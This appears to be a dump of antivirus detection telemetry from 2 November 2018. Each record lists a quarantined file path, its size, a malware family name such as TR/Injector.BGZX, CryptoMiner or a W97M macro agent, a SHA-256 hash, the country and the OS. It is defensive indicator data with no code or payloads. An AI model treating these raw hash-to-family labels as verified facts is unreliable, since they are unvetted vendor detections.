  Row(detection=Row(filename='avscan-20181102-061355-726e49fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061355-726E49FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:04:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052211-388e9b68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052211-388E9B68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061440-8d9d3608', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061440-8D9D3608', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054254-1d49f023', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054254-1D49F023', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050728-2a1620cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050728-2A1620CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061339-692b697a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061339-692B697A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135644-df3181c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd546174\\AVSCAN-20181102-135628-DD2502D8\\AVSCAN-20181102-135644-DF3181C8', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060401-108386f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060401-108386F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053021-5c6a42ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053021-5C6A42EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053527-1343e5fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053527-1343E5FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060821-abe54977', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060821-ABE54977', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061349-6f0d6d9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061349-6F0D6D9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050446-c9bdf864', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050446-C9BDF864', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053643-4099a5c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053643-4099A5C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055509-d3c905c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055509-D3C905C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060546-4f56371f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060546-4F56371F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051838-b960111d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051838-B960111D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052340-6d98dbb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052340-6D98DBB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060535-4882d9c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060535-4882D9C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051046-a085fc35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051046-A085FC35', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055012-225ee621', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055012-225EE621', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053046-6b46a0b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053046-6B46A0B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052753-04437e51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052753-04437E51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052956-4dbd5a33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052956-4DBD5A33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055332-99b55a4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055332-99B55A4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051842-bbefda80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051842-BBEFDA80', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060529-44d8042c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060529-44D8042C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052703-e6ab7e4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052703-E6AB7E4E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060835-b3f6b364', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060835-B3F6B364', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062430-ed253c5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062430-ED253C5B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055602-f3687439', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055602-F3687439', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053834-8290e888', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053834-8290E888', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050644-101308c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050644-101308C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053510-08bab552', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053510-08BAB552', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051138-bf105155', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051138-BF105155', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055813-410526b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055813-410526B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060217-d2e45901', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060217-D2E45901', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050824-4b6b25df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050824-4B6B25DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060000-811bf082', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060000-811BF082', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060733-8ec8e659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060733-8EC8E659', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052617-cb47ff66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052617-CB47FF66', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051220-d80c8ffd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051220-D80C8FFD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191342-571211e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd4c2ec0\\AVSCAN-20181102-191322-543CD03D\\AVSCAN-20181102-191342-571211E0', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='79c96eaf2b23f7914f13b78c7c3b09faf3c1d5c9f602a0e3119b823b71f1bffb', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:13:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060147-c0907798', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060147-C0907798', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:52:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145516-359c9b4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-150956-499E2B77\\AVSCAN-20181102-145516-359C9B4F', filesize=768000, name='Adware/DealPly.7eb84c.#M1.#R1'), hash='7eb84cddc65713657bd94e7995a806e32c7983547acd5f7118def39d4fc674e6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062646-3e432b4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062646-3E432B4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053814-76a5b35b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053814-76A5B35B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055917-678e33ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055917-678E33AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060912-ca018fca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060912-CA018FCA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061547-b554493c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061547-B554493C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051226-dbb8079c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051226-DBB8079C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055455-cb1e3841', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055455-CB1E3841', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:54Z'), dt=datetime.date(2018, 11, 2)),
